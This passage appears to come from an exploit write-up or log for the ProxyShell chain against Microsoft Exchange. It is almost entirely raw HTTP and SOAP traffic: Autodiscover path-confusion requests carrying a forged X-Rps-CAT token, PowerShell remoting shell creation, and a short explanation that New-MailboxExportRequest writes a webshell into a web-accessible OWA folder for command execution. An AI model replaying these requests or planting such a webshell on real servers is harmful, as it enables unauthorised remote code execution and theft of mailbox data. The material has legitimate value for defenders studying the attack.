xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:21622E17-57BA-495C-986B-86396EAAF295</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 77f3a4e1-bad4-4946-a11d-a3105b426324 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 602 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/DeleteResponse</a:Action><a:MessageID>uuid:7ED0491F-5478-4C6F-B2D5-5BCA64CCC90E</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:21622E17-57BA-495C-986B-86396EAAF295</a:RelatesTo></s:Header><s:Body></s:Body></s:Envelope>
Finally, the file write vulnerability is triggered via the New-MailboxExportRequest
cmdlet, writing the user’s mailbox – and the webshell – to a web-accessible folder. The webshell is subsequently available for command execution.
[*] Writing to: \\\\win-bpid95acq7e.exchg.lan\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\9CTEoswT2.aspx #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 12138 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B8554A3D-F3E5-40B8-BD52-180C49266838</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action><w:OptionSet env:mustUnderstand="true"><w:Option Name="protocolversion" MustComply="true">2.3</w:Option></w:OptionSet></env:Header><env:Body><rsp:Shell ShellId="64AB7291-77AD-4EBF-8674-B414FF6F4D4E" Name="Runspace"><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADhAgAAAAIAAQCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxWZXJzaW9uIE49InByb3RvY29sdmVyc2lvbiI+Mi4zPC9WZXJzaW9uPgogICAgPFZlcnNpb24gTj0iUFNWZXJzaW9uIj4yLjA8L1ZlcnNpb24+CiAgICA8VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj4KICA8L01TPgo8L09iaj4KAAAAAAAAAAIAAAAAAAAAAAMAAB0VAgAAAAQAAQCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxJMzIgTj0iTWluUnVuc3BhY2VzIj4xPC9JMzI+CiAgICA8STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPgogICAgPE9iaiBOPSJQU1RocmVhZE9wdGlvbnMiIFJlZklkPSIxIj4KICAgICAgPFROIFJlZklkPSIwIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+RGVmYXVsdDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8T2JqIE49IkFwYXJ0bWVudFN0YXRlIiBSZWZJZD0iMiI+CiAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iQXBwbGljYXRpb25Bcmd1bWVudHMiIFJlZklkPSIzIj4KICAgICAgPFROIFJlZklkPSIyIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTUHJpbWl0aXZlRGljdGlvbmFyeTwvVD4KICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxEQ1Q+CiAgICAgICAgPEVuPgogICAgICAgICAgPFMgTj0iS2V5Ij5QU1ZlcnNpb25UYWJsZTwvUz4KICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI0Ij4KICAgICAgICAgICAgPFROUmVmIFJlZklkPSIyIiAvPgogICAgICAgICAgICA8RENUPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjUuMC4xMTA4Mi4xMDAwPC9WZXJzaW9uPgogICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgPFMgTj0iS2V5Ij5QU0NvbXBhdGlibGVWZXJzaW9uczwvUz4KICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI1Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmVyc2lvbltdPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5BcnJheTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjEuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj4yLjA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgICAgICAgPFZlcnNpb24+My4wPC9WZXJzaW9uPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjQuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj41LjAuMTEwODIuMTAwMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+Q0xSVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj40LjAuMzAzMTkuNDIwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4xMC4wLjExMDgyLjEwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPldTTWFuU3RhY2tWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNSZW1vdGluZ1Byb3RvY29sVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4yLjM8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjEuMS4wLjE8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgPC9EQ1Q+CiAgICAgICAgICA8L09iaj4KICAgICAgICA8L0VuPgogICAgICA8L0RDVD4KICAgIDwvT2JqPgogICAgPE9iaiBOPSJIb3N0SW5mbyIgUmVmSWQ9IjYiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJfaG9zdERlZmF1bHREYXRhIiBSZWZJZD0iNyI+CiAgICAgICAgICA8TVM+CiAgICAgICAgICAgIDxPYmogTj0iZGF0YSIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgIDxUTiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgIDxEQ1Q+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij45PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uU3RyaW5nPC9TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+QzpcZGV2XGtpdGNoZW4tdmFncmFudDwvUz4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij44PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxMSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj4xOTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49ImhlaWdodCI+NTI8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjc8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjEyIj4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkhvc3QuU2l6ZTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjEzIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0id2lkdGgiPjgwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjUyPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij42PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxNSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj44MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iaGVpZ2h0Ij4yNTwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+NTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTYiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5TaXplPC9TPgogICAgICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWIiBSZWZJZD0iMTciPgogICAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJ3aWR0aCI+MjUwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjk5OTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjQ8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjE4Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uSW50MzI8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjI1PC9JMzI+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MzwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTkiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIwIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk3NDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MjwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjEiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk5ODwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjMiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5Db25zb2xlQ29sb3I8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjA8L0kzMj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij4wPC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIyNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLkNvbnNvbGVDb2xvcjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iViI+NzwvSTMyPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8L0RDVD4KICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICA8L01TPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49Il9pc0hvc3ROdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij5mYWxzZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogIDwvTVM+CjwvT2JqPgo=</creationXml></rsp:Shell></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 88a6e436-0d32-452b-ac1d-bbd1d3940dea X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 1640 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:45776F6D-DD5F-4D8D-B682-A0F3B36E3E8B</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B8554A3D-F3E5-40B8-BD52-180C49266838</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>http://127.0.0.1/PowerShell/</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"><rsp:ShellId>A45206E8-5119-4982-BEF9-9F2F7C0121B0</rsp:ShellId><rsp:ResourceUri>http://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri><rsp:Owner>smcintyre@exchg.lan</rsp:Owner><rsp:ClientIP>fe80::d932:1cb5:5d16:a750%3</rsp:ClientIP><rsp:IdleTimeOut>PT900.000S</rsp:IdleTimeOut><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><rsp:ShellRunTime>P0DT0H0M0S</rsp:ShellRunTime><rsp:ShellInactivity>P0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1765 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B800BAFE-974D-45D1-9222-75B36A142CF3</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 867d4c34-bf03-4607-a918-af2d7e89a8f5 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 1062 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" 